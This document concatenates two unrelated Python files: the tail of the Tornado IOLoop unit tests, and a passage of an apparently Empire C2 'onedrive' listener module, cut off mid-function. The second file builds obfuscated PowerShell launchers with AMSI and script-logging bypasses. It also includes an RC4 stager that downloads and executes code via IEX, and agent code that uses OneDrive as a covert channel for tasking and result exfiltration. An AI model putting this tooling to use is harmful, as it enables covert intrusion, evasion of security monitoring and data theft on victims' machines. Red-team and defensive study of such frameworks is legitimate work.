self.io_loop.add_timeout(self.io_loop.time(), results.append, 1)
self.io_loop.add_timeout(datetime.timedelta(seconds=0), results.append, 2)
self.io_loop.call_at(self.io_loop.time(), results.append, 3)
self.io_loop.call_later(0, results.append, 4)
self.io_loop.call_later(0, self.stop)
self.wait()
# The asyncio event loop does not guarantee the order of these
# callbacks.
self.assertEqual(sorted(results), [1, 2, 3, 4])
def test_add_timeout_return(self):
# All the timeout methods return non-None handles that can be
# passed to remove_timeout.
handle = self.io_loop.add_timeout(self.io_loop.time(), lambda: None)
self.assertFalse(handle is None)
self.io_loop.remove_timeout(handle)
def test_call_at_return(self):
handle = self.io_loop.call_at(self.io_loop.time(), lambda: None)
self.assertFalse(handle is None)
self.io_loop.remove_timeout(handle)
def test_call_later_return(self):
handle = self.io_loop.call_later(0, lambda: None)
self.assertFalse(handle is None)
self.io_loop.remove_timeout(handle)
def test_close_file_object(self):
"""When a file object is used instead of a numeric file descriptor,
the object should be closed (by IOLoop.close(all_fds=True),
not just the fd.
"""
# Use a socket since they are supported by IOLoop on all platforms.
# Unfortunately, sockets don't support the .closed attribute for
# inspecting their close status, so we must use a wrapper.
class SocketWrapper(object):
def __init__(self, sockobj):
self.sockobj = sockobj
self.closed = False
def fileno(self):
return self.sockobj.fileno()
def close(self):
self.closed = True
self.sockobj.close()
sockobj, port = bind_unused_port()
socket_wrapper = SocketWrapper(sockobj)
io_loop = IOLoop()
io_loop.add_handler(socket_wrapper, lambda fd, events: None, IOLoop.READ)
io_loop.close(all_fds=True)
self.assertTrue(socket_wrapper.closed)
def test_handler_callback_file_object(self):
"""The handler callback receives the same fd object it passed in."""
server_sock, port = bind_unused_port()
fds = []
def handle_connection(fd, events):
fds.append(fd)
conn, addr = server_sock.accept()
conn.close()
self.stop()
self.io_loop.add_handler(server_sock, handle_connection, IOLoop.READ)
with contextlib.closing(socket.socket()) as client_sock:
client_sock.connect(("127.0.0.1", port))
self.wait()
self.io_loop.remove_handler(server_sock)
self.io_loop.add_handler(server_sock.fileno(), handle_connection, IOLoop.READ)
with contextlib.closing(socket.socket()) as client_sock:
client_sock.connect(("127.0.0.1", port))
self.wait()
self.assertIs(fds[0], server_sock)
self.assertEqual(fds[1], server_sock.fileno())
self.io_loop.remove_handler(server_sock.fileno())
server_sock.close()
def test_mixed_fd_fileobj(self):
server_sock, port = bind_unused_port()
def f(fd, events):
pass
self.io_loop.add_handler(server_sock, f, IOLoop.READ)
with self.assertRaises(Exception):
# The exact error is unspecified - some implementations use
# IOError, others use ValueError.
self.io_loop.add_handler(server_sock.fileno(), f, IOLoop.READ)
self.io_loop.remove_handler(server_sock.fileno())
server_sock.close()
def test_reentrant(self):
"""Calling start() twice should raise an error, not deadlock."""
returned_from_start = [False]
got_exception = [False]
def callback():
try:
self.io_loop.start()
returned_from_start[0] = True
except Exception:
got_exception[0] = True
self.stop()
self.io_loop.add_callback(callback)
self.wait()
self.assertTrue(got_exception[0])
self.assertFalse(returned_from_start[0])
def test_exception_logging(self):
"""Uncaught exceptions get logged by the IOLoop."""
self.io_loop.add_callback(lambda: 1 / 0)
self.io_loop.add_callback(self.stop)
with ExpectLog(app_log, "Exception in callback"):
self.wait()
def test_exception_logging_future(self):
"""The IOLoop examines exceptions from Futures and logs them."""
@gen.coroutine
def callback():
self.io_loop.add_callback(self.stop)
1 / 0
self.io_loop.add_callback(callback)
with ExpectLog(app_log, "Exception in callback"):
self.wait()
def test_exception_logging_native_coro(self):
"""The IOLoop examines exceptions from awaitables and logs them."""
async def callback():
# Stop the IOLoop two iterations after raising an exception
# to give the exception time to be logged.
self.io_loop.add_callback(self.io_loop.add_callback, self.stop)
1 / 0
self.io_loop.add_callback(callback)
with ExpectLog(app_log, "Exception in callback"):
self.wait()
def test_spawn_callback(self):
# Both add_callback and spawn_callback run directly on the IOLoop,
# so their errors are logged without stopping the test.
self.io_loop.add_callback(lambda: 1 / 0)
self.io_loop.add_callback(self.stop)
with ExpectLog(app_log, "Exception in callback"):
self.wait()
# A spawned callback is run directly on the IOLoop, so it will be
# logged without stopping the test.
self.io_loop.spawn_callback(lambda: 1 / 0)
self.io_loop.add_callback(self.stop)
with ExpectLog(app_log, "Exception in callback"):
self.wait()
@skipIfNonUnix
def test_remove_handler_from_handler(self):
# Create two sockets with simultaneous read events.
client, server = socket.socketpair()
try:
client.send(b"abc")
server.send(b"abc")
# After reading from one fd, remove the other from the IOLoop.
chunks = []
def handle_read(fd, events):
chunks.append(fd.recv(1024))
if fd is client:
self.io_loop.remove_handler(server)
else:
self.io_loop.remove_handler(client)
self.io_loop.add_handler(client, handle_read, self.io_loop.READ)
self.io_loop.add_handler(server, handle_read, self.io_loop.READ)
self.io_loop.call_later(0.1, self.stop)
self.wait()
# Only one fd was read; the other was cleanly removed.
self.assertEqual(chunks, [b"abc"])
finally:
client.close()
server.close()
@skipIfNonUnix
@gen_test
def test_init_close_race(self):
# Regression test for #2367
#
# Skipped on windows because of what looks like a bug in the
# proactor event loop when started and stopped on non-main
# threads.
def f():
for i in range(10):
loop = IOLoop(make_current=False)
loop.close()
yield gen.multi([self.io_loop.run_in_executor(None, f) for i in range(2)])
# Deliberately not a subclass of AsyncTestCase so the IOLoop isn't
# automatically set as current.
class TestIOLoopCurrent(unittest.TestCase):
def setUp(self):
setup_with_context_manager(self, ignore_deprecation())
self.io_loop = None # type: typing.Optional[IOLoop]
IOLoop.clear_current()
def tearDown(self):
if self.io_loop is not None:
self.io_loop.close()
def test_default_current(self):
self.io_loop = IOLoop()
# The first IOLoop with default arguments is made current.
self.assertIs(self.io_loop, IOLoop.current())
# A second IOLoop can be created but is not made current.
io_loop2 = IOLoop()
self.assertIs(self.io_loop, IOLoop.current())
io_loop2.close()
def test_non_current(self):
self.io_loop = IOLoop(make_current=False)
# The new IOLoop is not initially made current.
self.assertIsNone(IOLoop.current(instance=False))
# Starting the IOLoop makes it current, and stopping the loop
# makes it non-current. This process is repeatable.
for i in range(3):
def f():
self.current_io_loop = IOLoop.current()
assert self.io_loop is not None
self.io_loop.stop()
self.io_loop.add_callback(f)
self.io_loop.start()
self.assertIs(self.current_io_loop, self.io_loop)
# Now that the loop is stopped, it is no longer current.
self.assertIsNone(IOLoop.current(instance=False))
def test_force_current(self):
self.io_loop = IOLoop(make_current=True)
self.assertIs(self.io_loop, IOLoop.current())
with self.assertRaises(RuntimeError):
# A second make_current=True construction cannot succeed.
IOLoop(make_current=True)
# current() was not affected by the failed construction.
self.assertIs(self.io_loop, IOLoop.current())
class TestIOLoopCurrentAsync(AsyncTestCase):
def setUp(self):
super().setUp()
setup_with_context_manager(self, ignore_deprecation())
@gen_test
def test_clear_without_current(self):
# If there is no current IOLoop, clear_current is a no-op (but
# should not fail). Use a thread so we see the threading.Local
# in a pristine state.
with ThreadPoolExecutor(1) as e:
yield e.submit(IOLoop.clear_current)
class TestIOLoopFutures(AsyncTestCase):
def test_add_future_threads(self):
with futures.ThreadPoolExecutor(1) as pool:
def dummy():
pass
self.io_loop.add_future(
pool.submit(dummy), lambda future: self.stop(future)
)
future = self.wait()
self.assertTrue(future.done())
self.assertTrue(future.result() is None)
@gen_test
def test_run_in_executor_gen(self):
event1 = threading.Event()
event2 = threading.Event()
def sync_func(self_event, other_event):
self_event.set()
other_event.wait()
# Note that return value doesn't actually do anything,
# it is just passed through to our final assertion to
# make sure it is passed through properly.
return self_event
# Run two synchronous functions, which would deadlock if not
# run in parallel.
res = yield [
IOLoop.current().run_in_executor(None, sync_func, event1, event2),
IOLoop.current().run_in_executor(None, sync_func, event2, event1),
]
self.assertEqual([event1, event2], res)
@gen_test
def test_run_in_executor_native(self):
event1 = threading.Event()
event2 = threading.Event()
def sync_func(self_event, other_event):
self_event.set()
other_event.wait()
return self_event
# Go through an async wrapper to ensure that the result of
# run_in_executor works with await and not just gen.coroutine
# (simply passing the underlying concurrent future would do that).
async def async_wrapper(self_event, other_event):
return await IOLoop.current().run_in_executor(
None, sync_func, self_event, other_event
)
res = yield [async_wrapper(event1, event2), async_wrapper(event2, event1)]
self.assertEqual([event1, event2], res)
@gen_test
def test_set_default_executor(self):
count = [0]
class MyExecutor(futures.ThreadPoolExecutor):
def submit(self, func, *args):
count[0] += 1
return super().submit(func, *args)
event = threading.Event()
def sync_func():
event.set()
executor = MyExecutor(1)
loop = IOLoop.current()
loop.set_default_executor(executor)
yield loop.run_in_executor(None, sync_func)
self.assertEqual(1, count[0])
self.assertTrue(event.is_set())
class TestIOLoopRunSync(unittest.TestCase):
def setUp(self):
self.io_loop = IOLoop(make_current=False)
def tearDown(self):
self.io_loop.close()
def test_sync_result(self):
with self.assertRaises(gen.BadYieldError):
self.io_loop.run_sync(lambda: 42)
def test_sync_exception(self):
with self.assertRaises(ZeroDivisionError):
self.io_loop.run_sync(lambda: 1 / 0)
def test_async_result(self):
@gen.coroutine
def f():
yield gen.moment
raise gen.Return(42)
self.assertEqual(self.io_loop.run_sync(f), 42)
def test_async_exception(self):
@gen.coroutine
def f():
yield gen.moment
1 / 0
with self.assertRaises(ZeroDivisionError):
self.io_loop.run_sync(f)
def test_current(self):
def f():
self.assertIs(IOLoop.current(), self.io_loop)
self.io_loop.run_sync(f)
def test_timeout(self):
@gen.coroutine
def f():
yield gen.sleep(1)
self.assertRaises(TimeoutError, self.io_loop.run_sync, f, timeout=0.01)
def test_native_coroutine(self):
@gen.coroutine
def f1():
yield gen.moment
async def f2():
await f1()
self.io_loop.run_sync(f2)
class TestPeriodicCallbackMath(unittest.TestCase):
def simulate_calls(self, pc, durations):
"""Simulate a series of calls to the PeriodicCallback.
Pass a list of call durations in seconds (negative values
work to simulate clock adjustments during the call, or more or
less equivalently, between calls). This method returns the
times at which each call would be made.
"""
calls = []
now = 1000
pc._next_timeout = now
for d in durations:
pc._update_next(now)
calls.append(pc._next_timeout)
now = pc._next_timeout + d
return calls
def dummy(self):
pass
def test_basic(self):
pc = PeriodicCallback(self.dummy, 10000)
self.assertEqual(
self.simulate_calls(pc, [0] * 5), [1010, 1020, 1030, 1040, 1050]
)
def test_overrun(self):
# If a call runs for too long, we skip entire cycles to get
# back on schedule.
call_durations = [9, 9, 10, 11, 20, 20, 35, 35, 0, 0, 0]
expected = [
1010,
1020,
1030, # first 3 calls on schedule
1050,
1070, # next 2 delayed one cycle
1100,
1130, # next 2 delayed 2 cycles
1170,
1210, # next 2 delayed 3 cycles
1220,
1230, # then back on schedule.
]
pc = PeriodicCallback(self.dummy, 10000)
self.assertEqual(self.simulate_calls(pc, call_durations), expected)
def test_clock_backwards(self):
pc = PeriodicCallback(self.dummy, 10000)
# Backwards jumps are ignored, potentially resulting in a
# slightly slow schedule (although we assume that when
# time.time() and time.monotonic() are different, time.time()
# is getting adjusted by NTP and is therefore more accurate)
self.assertEqual(
self.simulate_calls(pc, [-2, -1, -3, -2, 0]), [1010, 1020, 1030, 1040, 1050]
)
# For big jumps, we should perhaps alter the schedule, but we
# don't currently. This trace shows that we run callbacks
# every 10s of time.time(), but the first and second calls are
# 110s of real time apart because the backwards jump is
# ignored.
self.assertEqual(self.simulate_calls(pc, [-100, 0, 0]), [1010, 1020, 1030])
def test_jitter(self):
random_times = [0.5, 1, 0, 0.75]
expected = [1010, 1022.5, 1030, 1041.25]
call_durations = [0] * len(random_times)
pc = PeriodicCallback(self.dummy, 10000, jitter=0.5)
def mock_random():
return random_times.pop(0)
with mock.patch("random.random", mock_random):
self.assertEqual(self.simulate_calls(pc, call_durations), expected)
def test_timedelta(self):
pc = PeriodicCallback(lambda: None, datetime.timedelta(minutes=1, seconds=23))
expected_callback_time = 83000
self.assertEqual(pc.callback_time, expected_callback_time)
class TestPeriodicCallbackAsync(AsyncTestCase):
def test_periodic_plain(self):
count = 0
def callback() -> None:
nonlocal count
count += 1
if count == 3:
self.stop()
pc = PeriodicCallback(callback, 10)
pc.start()
self.wait()
pc.stop()
self.assertEqual(count, 3)
def test_periodic_coro(self) -> None:
counts = [0, 0]
@gen.coroutine
def callback() -> "Generator[Future[None], object, None]":
counts[0] += 1
yield gen.sleep(0.025)
counts[1] += 1
if counts[1] == 3:
pc.stop()
self.io_loop.add_callback(self.stop)
pc = PeriodicCallback(callback, 10)
pc.start()
self.wait()
self.assertEqual(counts[0], 3)
self.assertEqual(counts[1], 3)
def test_periodic_async(self) -> None:
counts = [0, 0]
async def callback() -> None:
counts[0] += 1
await gen.sleep(0.025)
counts[1] += 1
if counts[1] == 3:
pc.stop()
self.io_loop.add_callback(self.stop)
pc = PeriodicCallback(callback, 10)
pc.start()
self.wait()
self.assertEqual(counts[0], 3)
self.assertEqual(counts[1], 3)
class TestIOLoopConfiguration(unittest.TestCase):
def run_python(self, *statements):
stmt_list = [
"from tornado.ioloop import IOLoop",
"classname = lambda x: x.__class__.__name__",
] + list(statements)
args = [sys.executable, "-c", "; ".join(stmt_list)]
return native_str(subprocess.check_output(args)).strip()
def test_default(self):
# When asyncio is available, it is used by default.
cls = self.run_python("print(classname(IOLoop.current()))")
self.assertEqual(cls, "AsyncIOMainLoop")
cls = self.run_python("print(classname(IOLoop()))")
self.assertEqual(cls, "AsyncIOLoop")
def test_asyncio(self):
cls = self.run_python(
'IOLoop.configure("tornado.platform.asyncio.AsyncIOLoop")',
"print(classname(IOLoop.current()))",
)
self.assertEqual(cls, "AsyncIOMainLoop")
def test_asyncio_main(self):
cls = self.run_python(
"from tornado.platform.asyncio import AsyncIOMainLoop",
"AsyncIOMainLoop().install()",
"print(classname(IOLoop.current()))",
)
self.assertEqual(cls, "AsyncIOMainLoop")
if __name__ == "__main__":
unittest.main()
|
onedrive.py | import base64
import random
import os
import re
import time
from datetime import datetime
import copy
import traceback
import sys
import json
from pydispatch import dispatcher
from requests import Request, Session
#Empire imports
from lib.common import helpers
from lib.common import agents
from lib.common import encryption
from lib.common import packets
from lib.common import messages
from lib.common import bypasses
class Listener:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Onedrive',
'Author': ['@mr64bit'],
'Description': ('Starts a Onedrive listener. Setup instructions here: gist.github.com/mr64bit/3fd8f321717c9a6423f7949d494b6cd9'),
'Category': ('third_party'),
'Comments': ["Note that deleting STAGE0-PS.txt from the staging folder will break existing launchers"]
}
self.options = {
'Name' : {
'Description' : 'Name for the listener.',
'Required' : True,
'Value' : 'onedrive'
},
'ClientID' : {
'Description' : 'Application ID of the OAuth App.',
'Required' : True,
'Value' : ''
},
'ClientSecret' : {
'Description' : 'Client secret of the OAuth App.',
'Required' : True,
'Value' : ''
},
'AuthCode' : {
'Description' : 'Auth code given after authenticating OAuth App.',
'Required' : True,
'Value' : ''
},
'BaseFolder' : {
'Description' : 'The base Onedrive folder to use for comms.',
'Required' : True,
'Value' : 'empire'
},
'StagingFolder' : {
'Description' : 'The nested Onedrive staging folder.',
'Required' : True,
'Value' : 'staging'
},
'TaskingsFolder' : {
'Description' : 'The nested Onedrive taskings folder.',
'Required' : True,
'Value' : 'taskings'
},
'ResultsFolder' : {
'Description' : 'The nested Onedrive results folder.',
'Required' : True,
'Value' : 'results'
},
'Launcher' : {
'Description' : 'Launcher string.',
'Required' : True,
'Value' : 'powershell -noP -sta -w 1 -enc '
},
'StagingKey' : {
'Description' : 'Staging key for intial agent negotiation.',
'Required' : True,
'Value' : 'asdf'
},
'PollInterval' : {
'Description' : 'Polling interval (in seconds) to communicate with Onedrive.',
'Required' : True,
'Value' : '5'
},
'DefaultDelay' : {
'Description' : 'Agent delay/reach back interval (in seconds).',
'Required' : True,
'Value' : 60
},
'DefaultJitter' : {
'Description' : 'Jitter in agent reachback interval (0.0-1.0).',
'Required' : True,
'Value' : 0.0
},
'DefaultLostLimit' : {
'Description' : 'Number of missed checkins before exiting',
'Required' : True,
'Value' : 10
},
'DefaultProfile' : {
'Description' : 'Default communication profile for the agent.',
'Required' : True,
'Value' : "N/A|Microsoft SkyDriveSync 17.005.0107.0008 ship; Windows NT 10.0 (16299)"
},
'KillDate' : {
'Description' : 'Date for the listener to exit (MM/dd/yyyy).',
'Required' : False,
'Value' : ''
},
'WorkingHours' : {
'Description' : 'Hours for the agent to operate (09:00-17:00).',
'Required' : False,
'Value' : ''
},
'RefreshToken' : {
'Description' : 'Refresh token used to refresh the auth token',
'Required' : False,
'Value' : ''
},
'RedirectURI' : {
'Description' : 'Redirect URI of the registered application',
'Required' : True,
'Value' : "https://login.live.com/oauth20_desktop.srf"
},
'SlackToken' : {
'Description' : 'Your SlackBot API token to communicate with your Slack instance.',
'Required' : False,
'Value' : ''
},
'SlackChannel' : {
'Description' : 'The Slack channel or DM that notifications will be sent to.',
'Required' : False,
'Value' : '#general'
}
}
self.mainMenu = mainMenu
self.threads = {}
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
def default_response(self):
return ''
def validate_options(self):
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
#If we don't have an OAuth code yet, give the user a URL to get it
if (str(self.options['RefreshToken']['Value']).strip() == '') and (str(self.options['AuthCode']['Value']).strip() == ''):
if (str(self.options['ClientID']['Value']).strip() == ''):
print helpers.color("[!] ClientID needed to generate AuthCode URL!")
return False
params = {'client_id': str(self.options['ClientID']['Value']).strip(),
'response_type': 'code',
'redirect_uri': self.options['RedirectURI']['Value'],
'scope': 'files.readwrite offline_access'}
req = Request('GET','https://login.microsoftonline.com/common/oauth2/v2.0/authorize', params = params)
prep = req.prepare()
print helpers.color("[*] Get your AuthCode from \"%s\" and try starting the listener again." % prep.url)
return False
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print helpers.color("[!] Option \"%s\" is required." % (key))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None, scriptLogBypass=True, AMSIBypass=True, AMSIBypass2=False):
if not language:
print helpers.color("[!] listeners/onedrive generate_launcher(): No language specified")
if listenerName and (listenerName in self.threads) and (listenerName in self.mainMenu.listeners.activeListeners):
listener_options = self.mainMenu.listeners.activeListeners[listenerName]['options']
staging_key = listener_options['StagingKey']['Value']
profile = listener_options['DefaultProfile']['Value']
launcher_cmd = listener_options['Launcher']['Value']
staging_key = listener_options['StagingKey']['Value']
poll_interval = listener_options['PollInterval']['Value']
base_folder = listener_options['BaseFolder']['Value'].strip("/")
staging_folder = listener_options['StagingFolder']['Value']
taskings_folder = listener_options['TaskingsFolder']['Value']
results_folder = listener_options['ResultsFolder']['Value']
if language.startswith("power"):
launcher = "$ErrorActionPreference = 'SilentlyContinue';" #Set as empty string for debugging
if safeChecks.lower() == 'true':
launcher = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
if scriptLogBypass:
launcher += bypasses.scriptBlockLogBypass()
# @mattifestation's AMSI bypass
if AMSIBypass:
launcher += bypasses.AMSIBypass()
# rastamouse AMSI bypass
if AMSIBypass2:
launcher += bypasses.AMSIBypass2()
launcher += "};"
launcher += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
launcher += helpers.randomize_capitalization("$wc=New-Object SYstem.Net.WebClient;")
if userAgent.lower() == 'default':
profile = listener_options['DefaultProfile']['Value']
userAgent = profile.split("|")[1]
launcher += "$u='" + userAgent + "';"
if userAgent.lower() != 'none' or proxy.lower() != 'none':
if userAgent.lower() != 'none':
launcher += helpers.randomize_capitalization("$wc.Headers.Add(")
launcher += "'User-Agent',$u);"
if proxy.lower() != 'none':
if proxy.lower() == 'default':
launcher += helpers.randomize_capitalization("$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
launcher += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy;")
launcher += helpers.randomize_capitalization("$proxy.Address = '"+ proxy.lower() +"';")
launcher += helpers.randomize_capitalization("$wc.Proxy = $proxy;")
if proxyCreds.lower() == "default":
launcher += helpers.randomize_capitalization("$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
username = proxyCreds.split(":")[0]
password = proxyCreds.split(":")[1]
domain = username.split("\\")[0]
usr = username.split("\\")[1]
launcher += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
launcher += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
launcher += "$Script:Proxy = $wc.Proxy;"
# code to turn the key string into a byte array
launcher += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
launcher += ("'%s');" % staging_key)
# this is the minimized RC4 launcher code from rc4.ps1
launcher += helpers.randomize_capitalization('$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
launcher += helpers.randomize_capitalization("$data=$wc.DownloadData('")
launcher += self.mainMenu.listeners.activeListeners[listenerName]['stager_url']
launcher += helpers.randomize_capitalization("');$iv=$data[0..3];$data=$data[4..$data.length];")
launcher += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
launcher = helpers.obfuscate(self.mainMenu.installPath, launcher, obfuscationCommand=obfuscationCommand)
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(launcher, launcher_cmd)
else:
return launcher
if language.startswith("pyth"):
print helpers.color("[!] listeners/onedrive generate_launcher(): Python agent not implimented yet")
return "python not implimented yet"
else:
print helpers.color("[!] listeners/onedrive generate_launcher(): invalid listener name")
def generate_stager(self, listenerOptions, encode=False, encrypt=True, language=None, token=None):
"""
Generate the stager code
"""
if not language:
print helpers.color("[!] listeners/onedrive generate_stager(): no language specified")
return None
staging_key = listenerOptions['StagingKey']['Value']
base_folder = listenerOptions['BaseFolder']['Value']
staging_folder = listenerOptions['StagingFolder']['Value']
working_hours = listenerOptions['WorkingHours']['Value']
profile = listenerOptions['DefaultProfile']['Value']
agent_delay = listenerOptions['DefaultDelay']['Value']
if language.lower() == 'powershell':
f = open("%s/data/agent/stagers/onedrive.ps1" % self.mainMenu.installPath)
stager = f.read()
f.close()
stager = stager.replace("REPLACE_STAGING_FOLDER", "%s/%s" % (base_folder, staging_folder))
stager = stager.replace('REPLACE_STAGING_KEY', staging_key)
stager = stager.replace("REPLACE_TOKEN", token)
stager = stager.replace("REPLACE_POLLING_INTERVAL", str(agent_delay))
if working_hours != "":
stager = stager.replace("REPLACE_WORKING_HOURS", working_hours)
randomized_stager = ''
for line in stager.split("\n"):
line = line.strip()
if not line.startswith("#"):
if "\"" not in line:
randomized_stager += helpers.randomize_capitalization(line)
else:
randomized_stager += line
if encode:
return helpers.enc_powershell(randomized_stager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV+staging_key, randomized_stager)
else:
return randomized_stager
else:
print helpers.color("[!] Python agent not available for Onedrive")
def generate_comms(self, listener_options, client_id, client_secret, token, refresh_token, redirect_uri, language=None):
staging_key = listener_options['StagingKey']['Value']
base_folder = listener_options['BaseFolder']['Value']
taskings_folder = listener_options['TaskingsFolder']['Value']
results_folder = listener_options['ResultsFolder']['Value']
if not language:
print helpers.color("[!] listeners/onedrive generate_comms(): No language specified")
return
if language.lower() == "powershell":
#Function to generate a WebClient object with the required headers
token_manager = """
$Script:TokenObject = @{token="%s";refresh="%s";expires=(Get-Date).addSeconds(3480)};
$script:GetWebClient = {
$wc = New-Object System.Net.WebClient
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$wc.Proxy = $Script:Proxy;
}
if((Get-Date) -gt $Script:TokenObject.expires) {
$data = New-Object System.Collections.Specialized.NameValueCollection
$data.add("client_id", "%s")
$data.add("client_secret", "%s")
$data.add("grant_type", "refresh_token")
$data.add("scope", "files.readwrite offline_access")
$data.add("refresh_token", $Script:TokenObject.refresh)
$data.add("redirect_uri", "%s")
$bytes = $wc.UploadValues("https://login.microsoftonline.com/common/oauth2/v2.0/token", "POST", $data)
$response = [system.text.encoding]::ascii.getstring($bytes)
$Script:TokenObject.token = [regex]::match($response, '"access_token":"(.+?)"').groups[1].value
$Script:TokenObject.refresh = [regex]::match($response, '"refresh_token":"(.+?)"').groups[1].value
$expires_in = [int][regex]::match($response, '"expires_in":([0-9]+)').groups[1].value
$Script:TokenObject.expires = (get-date).addSeconds($expires_in - 15)
}
$wc.headers.add("User-Agent", $script:UserAgent)
$wc.headers.add("Authorization", "Bearer $($Script:TokenObject.token)")
$Script:Headers.GetEnumerator() | ForEach-Object {$wc.Headers.Add($_.Name, $_.Value)}
$wc
}
""" % (token, refresh_token, client_id, client_secret, redirect_uri)
post_message = """
$script:SendMessage = {
param($packets)
if($packets) {
$encBytes = encrypt-bytes $packets
$RoutingPacket = New-RoutingPacket -encData $encBytes -Meta 5
} else {
$RoutingPacket = ""
}
$wc = (& $GetWebClient)
$resultsFolder = "%s"
try {
try {
$data = $null
$data = $wc.DownloadData("https://graph.microsoft.com/v1.0/drive/root:/$resultsFolder/$($script:SessionID).txt:/content")
} catch {}
if($data -and $data.length -ne 0) {
$routingPacket = $data + $routingPacket
}
$wc = (& $GetWebClient)
$null = $wc.UploadData("https://graph.microsoft.com/v1.0/drive/root:/$resultsFolder/$($script:SessionID).txt:/content", "PUT", $RoutingPacket)
$script:missedChecking = 0
$script:lastseen = get-date
}
catch {
if($_ -match "Unable to connect") {
$script:missedCheckins += 1
}
}
}
""" % ("%s/%s" % (base_folder, results_folder))
get_message = """
$script:lastseen = Get-Date
$script:GetTask = {
try {
$wc = (& $GetWebClient)
$TaskingsFolder = "%s"
#If we haven't sent a message recently...
if($script:lastseen.addseconds($script:AgentDelay * 2) -lt (get-date)) {
(& $SendMessage -packets "")
}
$script:MissedCheckins = 0
$data = $wc.DownloadData("https://graph.microsoft.com/v1.0/drive/root:/$TaskingsFolder/$($script:SessionID).txt:/content")
if($data -and ($data.length -ne 0)) {
$wc = (& $GetWebClient)
$null = $wc.UploadString("https://graph.microsoft.com/v1.0/drive/root:/$TaskingsFolder/$($script:SessionID).txt", "DELETE", "")
if([system.text.encoding]::utf8.getString($data) -eq "RESTAGE") {
Start-Negotiate -T $script:TokenObject.token -SK $SK -PI $PI -UA $UA
}
$Data
}
}
catch {
if($_ -match "Unable to connect") {
$script:MissedCheckins += 1
}
}
}
""" % ("%s/%s" % (base_folder, taskings_folder))
return token_manager + post_message + get_message
def generate_agent(self, listener_options, client_id, client_secret, token, refresh_token, redirect_uri, language=None):
"""
Generate the agent code
"""
if not language:
print helpers.color("[!] listeners/onedrive generate_agent(): No language specified")
return
language = language.lower()
delay = listener_options['DefaultDelay']['Value']
jitter = listener_options['DefaultJitter']['Value']
profile = listener_options['DefaultProfile']['Value']
lost_limit = listener_options['DefaultLostLimit']['Value']
working_hours = listener_options['WorkingHours']['Value']
kill_date = listener_options['KillDate']['Value']
b64_default_response = base64.b64encode(self.default_response())
if language == 'powershell':
f = open(self.mainMenu.installPath + "/data/agent/agent.ps1")
agent_code = f.read()
f.close()
comms_code = self.generate_comms(listener_options, client_id, client_secret, token, refresh_token, redirect_uri, language)
agent_code = agent_code.replace("REPLACE_COMMS", comms_code)
agent_code = helpers.strip_powershell_comments(agent_code)
agent_code = agent_code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
agent_code = agent_code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
agent_code = agent_code.replace('$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', "$Profile = \"" + str(profile) + "\"")
agent_code = agent_code.replace('$LostLimit = 60', "$LostLimit = " + str(lost_limit))
agent_code = agent_code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+b64_default_response+'"')
if kill_date != "":
agent_code = agent_code.replace("$KillDate,", "$KillDate = '" + str(kill_date) + "',")
return agent_code
def start_server(self, listenerOptions):
# Utility functions to handle auth tasks and initial setup
def get_token(client_id, client_secret, code):
params = {'client_id': client_id,
'client_secret': client_secret,
'grant_type': 'authorization_code',
'scope': 'files.readwrite offline_access',
'code': code,
'redirect_uri': redirect_uri}
try:
r = s.post('https://login.microsoftonline.com/common/oauth2/v2.0/token', data=params)
r_token = r.json()
r_token['expires_at'] = time.time() + (int)(r_token['expires_in']) - 15
r_token['update'] = True
return r_token
except KeyError, e:
print helpers.color("[!] Something went wrong, HTTP response %d, error code %s: %s" % (r.status_code, r.json()['error_codes'], r.json()['error_description']))
raise
def renew_token(client_id, client_secret, refresh_token):
params = {'client_id': client_id,
'client_secret': client_secret,
'grant_type': 'refresh_token',
'scope': 'files.readwrite offline_access',
'refresh_token': refresh_token,
'redirect_uri': redirect_uri}
try:
r = s.post('https://login.microsoftonline.com/common/oauth2/v2.0/token', data=params)
r_token = r.json()
r_token['expires_at'] = time.time() + (int)(r_token['expires_in']) - 15
r_token['update'] = True
return r_token
except KeyError, e:
print helpers.color("[!] Something went wrong, HTTP response %d, error code %s: %s" % (r.status_code, r.json()['error_codes'], r.json()['error_description']))
raise
def test_token(token):
headers = s.headers.copy()
headers['Authorization'] = 'Bearer ' + token
request = s.get("%s/drive" % base_url, headers=headers)
return request.ok
def setup_folders():
if not (test_token(token['access_token'])):
raise ValueError("Could not set up folders, access token invalid")
base_object = s.get("%s/drive/root:/%s" % (base_url, base_folder))
if not (base_object.status_code == 200):
print helpers.color("[*] Creating %s folder" % base_folder)
